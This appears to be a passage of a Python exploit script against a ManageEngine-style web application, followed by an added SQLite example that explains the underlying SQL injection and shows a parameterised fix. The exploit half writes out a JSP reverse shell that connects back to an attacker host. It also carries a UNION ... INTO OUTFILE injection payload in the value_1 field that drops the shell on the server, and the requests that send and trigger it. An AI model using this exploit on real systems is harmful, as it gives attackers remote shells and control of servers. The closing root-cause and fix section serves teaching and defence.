# reverse shell JSP: one thread copies the process output to the socket,
# the other copies the socket input to the process
jsp = '''<%@page import="java.lang.*"%>
<%@page import="java.util.*"%>
<%@page import="java.io.*"%>
<%@page import="java.net.*"%>

<%
class StreamConnector extends Thread
{
InputStream is;
OutputStream os;

StreamConnector( InputStream is, OutputStream os )
{
this.is = is;
this.os = os;
}

public void run()
{
BufferedReader in  = null;
BufferedWriter out = null;
try
{
in  = new BufferedReader( new InputStreamReader( this.is ) );
out = new BufferedWriter( new OutputStreamWriter( this.os ) );
char buffer[] = new char[8192];
int length;
while( ( length = in.read( buffer, 0, buffer.length ) ) > 0 )
{
out.write( buffer, 0, length );
out.flush();
}
} catch( Exception e ){}
try
{
if( in != null )
in.close();
if( out != null )
out.close();
} catch( Exception e ){}
}
}

try
{
Socket socket = new Socket( "''' + lhost + '''", ''' + lport + ''' );
Process process = Runtime.getRuntime().exec( "''' + command + '''" );
( new StreamConnector( process.getInputStream(), socket.getOutputStream() ) ).start();
( new StreamConnector( socket.getInputStream(), process.getOutputStream() ) ).start();
} catch( Exception e ) {}
%>'''

# collapse to a single line so it survives the query string untouched
jsp = jsp.replace("\n", "").replace("\t", "")

# close the IN ((...)) of the original query, UNION in a row whose first column is
# the JSP as a hex literal, write that row to disk, then re-balance the parentheses
payload = "1)) "
payload += 'UNION SELECT 0x%s,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,21,22,23,24,25,26,27,28,29 INTO OUTFILE "%s"' % (jsp.encode().hex(), output_path)
payload += " FROM mysql.user WHERE 1=((1"

opener = urllib.request.build_opener()
opener.addheaders.append(('Cookie', 'STATE_COOKIE=%26SecurityManager%2FID%2F174%2FHomePageSubDAC_LIST%2F223%2FSecurityManager_CONTENTAREA_LIST%2F226%2FMainDAC_LIST%2F166%26MainTabs%2FID%2F167%2F_PV%2F174%2FselectedView%2FHome%26Home%2FID%2F166%2FPDCA%2FMainDAC%2F_PV%2F174%26HomePageSub%2FID%2F226%2FPDCA%2FSecurityManager_CONTENTAREA%2F_PV%2F166%26HomePageSubTab%2FID%2F225%2F_PV%2F226%2FselectedView%2FHomePageSecurity%26HomePageSecurity%2FID%2F223%2FPDCA%2FHomePageSubDAC%2F_PV%2F226%26_REQS%2F_RVID%2FSecurityManager%2F_TIME%2F31337; 2RequestsshowThreadedReq=showThreadedReqshow; 2RequestshideThreadedReq=hideThreadedReqhide;'))
post_params = urllib.parse.urlencode({'ANDOR': 'and', 'condition_1': 'OpenPorts@PORT', 'operator_1': 'IN', 'value_1': payload, 'COUNT': '1'}).encode()

print("[*] Sending evil payload")
resp = opener.open("http://%s:6262/STATE_ID/31337/jsp/xmlhttp/persistence.jsp?reqType=AdvanceSearch&SUBREQUEST=XMLHTTP" % rhost, post_params)
print("[*] Created Reverse JSP shell http://%s:6262/%s" % (rhost, filename))
# requesting the dropped JSP is what triggers the connect-back
resp = opener.open("http://%s:6262/%s" % (rhost, filename))
print("[*] Check your shell on %s %s\n" % (lhost, lport))
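The root cause the exploit above leans on, as an added example that is not from the exploit or from ManageEngine: an IN (...) list built by pasting value_1 into the query, shown beside a fixed version, on an in-memory SQLite table constructed for the purpose. SQLite has no INTO OUTFILE, so the injected UNION here only pulls rows from another table, but the payload has the same shape as the exploit's "1)) UNION SELECT ... WHERE 1=((1". The table layout is assumed, not the product's schema. Note that the fix addresses only the injection; the exploit also needs the database account to hold the FILE privilege and the service to run as root/SYSTEM, which are separate least-privilege failures.

```python
import sqlite3


def make_db():
    """Constructed stand-in for the scan-results table the search reads."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE open_ports(host TEXT, port INTEGER);
        INSERT INTO open_ports VALUES ('10.0.0.1', 22), ('10.0.0.1', 443), ('10.0.0.2', 3306);
        CREATE TABLE app_user(name TEXT, password TEXT);
        INSERT INTO app_user VALUES ('admin', 'S3cret!');
    """)
    return db


def search_vulnerable(db, value_1):
    """value_1 pasted into the IN list, the way the advanced search builds its query.

    The double parentheses are why the exploit's payload opens with "1))" and
    closes with "WHERE 1=((1": it has to close them and then reopen them.
    """
    sql = "SELECT host, port FROM open_ports WHERE port IN ((%s))" % value_1
    return db.execute(sql).fetchall()


def search_fixed(db, value_1):
    """Validate every element as an integer and bind one placeholder per element.

    A single ? cannot take a list, which is how IN clauses end up concatenated;
    generating the placeholders from the validated list keeps the binding.
    """
    ports = [int(p) for p in value_1.split(",")]        # ValueError on anything else
    placeholders = ",".join("?" * len(ports))
    sql = "SELECT host, port FROM open_ports WHERE port IN (%s) ORDER BY port" % placeholders
    return db.execute(sql, ports).fetchall()


# same structure as the exploit's payload, minus INTO OUTFILE
PAYLOAD = "22)) UNION ALL SELECT name, password FROM app_user WHERE 1=((1"


def demo():
    """(rows leaked by the vulnerable query, rows from a legitimate fixed query,
    whether the fixed query refused the payload)."""
    db = make_db()
    leaked = search_vulnerable(db, PAYLOAD)
    try:
        search_fixed(db, PAYLOAD)
        blocked = False
    except ValueError:
        blocked = True
    return leaked, search_fixed(db, "22,443"), blocked


if __name__ == "__main__":
    print(demo())
```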